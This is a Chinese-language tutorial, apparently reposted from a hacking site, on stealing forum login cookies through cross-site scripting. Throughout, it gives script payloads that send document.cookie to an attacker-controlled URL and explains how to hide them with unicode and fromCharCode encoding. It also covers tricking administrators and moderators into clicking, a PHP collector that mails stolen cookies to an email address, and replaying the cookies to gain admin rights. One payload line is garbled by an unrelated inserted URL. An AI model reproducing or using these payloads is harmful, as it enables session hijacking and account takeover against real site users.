XSS攻擊Cookie欺騙中隱藏JavaScript執行

自己弄個偷cookie的文件。

目的是讓其他瀏覽者去瀏覽我們設計好的陷阱
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

怎么弄其實也不用我多說了。

現在主要說的是如何隱藏JavaScript執行。

大家可能習慣每天去milw0rm.com看EXP，

每當發布XSS漏洞的EXP，當我們利用的時候。

卻無法cookie任何信息，這是為什么呢。

像魔力，PHPBB這樣大型的論壇都具備XSS漏洞。

我給的這個
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

會顯示Javascript 錯誤。

解決辦法有2種，我們可以把外部敏感信息用unicode編碼

給個URL：http://www.mikezilla.com/exp0012.html

通過編碼就是這樣：
<script>eval(location.href="http://www.php1.cn/">
上述還不行就用第2種方法

Javascript fromCharCode中的eval功能

上面說了可以用unicode編碼過一些站

比如編碼后的104，116，116，112就是HTTP

如果論壇用了其他的編輯器，比如PHPWind 用的所見所得編輯器

直接打上http://url.com肯定會暴露。

那么我們就看編輯器的形式來調換URL

比如偷COOKIE的站是http://www.URL.com

我們就這樣
http://www.url.com

當然顯示的部分你可以替換成吸引人的信息騙取管理和斑竹的點擊

用一點社會工程學就可以了。

好了現在都完成了初步的設想，開始實現吧

第1步：管理看見我們構造好的陷阱，并且點了他

第2步：Javascript 執行成功了。。

第3步：構造好的偷COOKIE文件偷取到Cookie

第4步：我們不可能傻到URL連接是純文本，將URL用Unicode編碼（這里習慣說是加密）http://www.mikezilla.com/exp0012.html

第5步：截取的Cookie信息當然不是明文的，我們只要使用FireFox Cookie 編輯器
替換COOKIE就OK了，或者用CookieEditor等其他工具。

個人建議：偷取Cookie不一定就使用空間收取Cookie信息
比如構造個郵箱收取就這樣
<?

mail("hackeroo@hotmail.com","cookie monster",$_REQUEST[cookie]);

?>
<html>
<script>document.location=http://www.URL.com/'</script>
</html>

好了偷到有價值的信息替換Cookie就行了。替換斑竹的就是斑竹權限，替換管理的就和是管理權限。

聲明：本網頁內容旨在傳播知識，若有侵權等問題請及時與本網聯系，我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com